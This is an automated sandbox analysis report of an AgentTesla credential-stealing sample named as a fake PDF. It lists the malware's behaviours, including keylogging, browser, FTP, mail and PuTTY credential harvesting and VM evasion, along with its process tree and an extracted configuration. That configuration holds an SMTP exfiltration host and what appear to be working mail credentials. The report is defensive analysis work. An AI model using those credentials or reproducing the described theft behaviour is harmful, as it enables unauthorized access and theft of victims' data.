Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report A4-058000200390-10-14_REV_pdf.exe

Overview

General Information

Sample Name:A4-058000200390-10-14_REV_pdf.exe
Analysis ID:356536
MD5:5af8f94a752ca9996fbfbf01dcc30edd
SHA1:b52d9ba9b7890e2b51e64ab889805cfce5126ebb
SHA256:b37d450b7d60fd2497ae794e9835b999339549406b1a05d92bb46a9f1a23eb12
Tags:AgentTeslaexe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • A4-058000200390-10-14_REV_pdf.exe (PID: 7040 cmdline: 'C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe' MD5: 5AF8F94A752CA9996FBFBF01DCC30EDD)
    • cmd.exe (PID: 1364 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 2228 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 6300 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1588 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • NewApp.exe (PID: 2092 cmdline: 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe' MD5: 5AF8F94A752CA9996FBFBF01DCC30EDD)
    • cmd.exe (PID: 7132 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6576 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • NewApp.exe (PID: 6416 cmdline: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe MD5: 5AF8F94A752CA9996FBFBF01DCC30EDD)
    • WerFault.exe (PID: 4112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1956 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • NewApp.exe (PID: 1216 cmdline: 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe' MD5: 5AF8F94A752CA9996FBFBF01DCC30EDD)
    • cmd.exe (PID: 4488 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5032 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • NewApp.exe (PID: 1504 cmdline: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe MD5: 5AF8F94A752CA9996FBFBF01DCC30EDD)
    • WerFault.exe (PID: 1716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1868 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "EeCndWA", "URL: ": "http://2nUtGMgnxihCA8N2g.org", "To: ": "admin@soonlogistics.com", "ByHost: ": "mail.soonlogistics.com:587", "Password: ": "rLe4bkEV", "From: ": "admin@soonlogistics.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001F.00000002.811192969.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000012.00000002.833553760.00000000042AC000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.2.NewApp.exe.42f16b0.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              31.2.NewApp.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  18.2.NewApp.exe.42ac090.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 10 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: A4-058000200390-10-14_REV_pdf.exe.1572.8.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "EeCndWA", "URL: ": "http://2nUtGMgnxihCA8N2g.org", "To: ": "admin@soonlogistics.com", "ByHost: ": "mail.soonlogistics.com:587", "Password: ": "rLe4bkEV", "From: ": "admin@soonlogistics.com"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeReversingLabs: Detection: 12%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: A4-058000200390-10-14_REV_pdf.exeReversingLabs: Detection: 12%
                      Source: 31.2.NewApp.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 24.2.NewApp.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.2.A4-058000200390-10-14_REV_pdf.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

                      Compliance:

                      barindex
                      Uses 32bit PE filesShow sources
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                      Source: A4-058000200390-10-14_REV_pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: NewApp.PDB source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbcB source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.673776774.0000000004C7B000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: dnsapi.pdbJ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb` source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbjB source: NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp, NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: urlmon.pdb* source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: iVisualBasic.pdb\3 source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbd source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb@ source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb)gc}+ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb, source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: iertutil.pdb> source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb" source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: rasadhlp.pdb& source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbx source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: iVisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.PDB source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: winhttp.pdbn source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbw_ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb4 source: WerFault.exe, 0000000B.00000003.685897028.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb^ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: winnsi.pdbL source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Server source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: fwpuclnt.pdbF source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbh source: WerFault.exe, 0000001A.00000003.799925426.000000000523B000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp, NewApp.exe, 00000012.00000002.815445862.00000000011F5000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\NewApp\NewApp.PDB source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb[ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp, NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: psapi.pdb!-0 source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb9\ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697430851.00000000010DF000.00000004.00000020.sdmp
                      Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb` source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: msasn1.pdbt source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: ml.pdb&& source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: dhcpcsvc.pdbP source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb* source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb* source: NewApp.exe, 00000012.00000002.815445862.00000000011F5000.00000004.00000020.sdmp
